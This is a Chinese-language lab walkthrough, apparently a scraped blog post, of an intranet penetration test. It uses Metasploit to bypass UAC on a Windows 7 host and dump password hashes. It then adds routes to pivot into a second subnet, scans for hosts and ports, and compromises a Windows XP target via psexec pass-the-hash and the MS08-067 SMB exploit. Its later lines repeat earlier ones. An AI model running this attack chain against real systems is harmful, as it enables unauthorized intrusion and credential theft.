对内网渗透需要渗透的目标主机处于跨网段和uac限制的情况做一个渗透记录

环境大致如下拥有shell权限的win7(有uac限制，处于双网段) 和同win7同一网段下暂时无权限的靶机xp

内网渗透bypassuac和smb溢出-LMLPHP

先对有权限的win7进行hashdump

内网渗透bypassuac和smb溢出-LMLPHP

显示失败 getsystem一下

内网渗透bypassuac和smb溢出-LMLPHP

还是失败用msf的模块绕过uac

use exploit/windows/local/bypassuac

set session 1(session1 为我们的win7权限)

内网渗透bypassuac和smb溢出-LMLPHP

此时再进入meterpreter hashdump下 getsystem

内网渗透bypassuac和smb溢出-LMLPHP

可以看到绕过了uac 获得了权限

导出了hash 接下来对和win7同网段的xp进行扫描探测

得到本地子网网段

run get_local_subnets

内网渗透bypassuac和smb溢出-LMLPHP

处于192.168.100.0 子网掩码为255.255.255.0这个网段

run autoroute -s 网段添加路由 -p 查看已经添加的路由

内网渗透bypassuac和smb溢出-LMLPHP

添加完成后开始扫描

扫描存活ip

run post/windows/gather/arp_scanner RHOST=网段

内网渗透bypassuac和smb溢出-LMLPHP

发现内网以下存在这些主机其中192.168.100.5 是目标xp

确定了目标接下来扫描端口

内网渗透bypassuac和smb溢出-LMLPHP

扫描端口

run axiliary/scanner/portscan/tcp

探测完信息后

可以通过之前抓的hash值进行hash传递攻击

使用msf 下的exploit/windows/smb/psexec

也可以通过对应服务溢出漏洞渗透拿到目标xp的权限

开放了smb 使用了ms08_067 溢出成功

内网渗透bypassuac和smb溢出-LMLPHP

UAC

内网渗透bypassuac和smb溢出

对内网渗透需要渗透的目标主机处于跨网段和uac限制的情况做一个渗透记录

环境大致如下 拥有shell权限的win7(有uac限制，处于双网段) 和同win7同一网段下暂时无权限的靶机xp

先对有权限的win7进行hashdump

还是失败 用msf的模块绕过uac

可以看到绕过了uac 获得了权限

run get_local_subnets

run autoroute -s 网段 添加路由 -p 查看已经添加的路由

run post/windows/gather/arp_scanner RHOST=网段

确定了目标 接下来扫描端口

扫描端口

run axiliary/scanner/portscan/tcp

使用msf 下的exploit/windows/smb/psexec

开放了smb 使用了ms08_067 溢出成功

环境大致如下拥有shell权限的win7(有uac限制，处于双网段) 和同win7同一网段下暂时无权限的靶机xp

还是失败用msf的模块绕过uac

run autoroute -s 网段添加路由 -p 查看已经添加的路由

确定了目标接下来扫描端口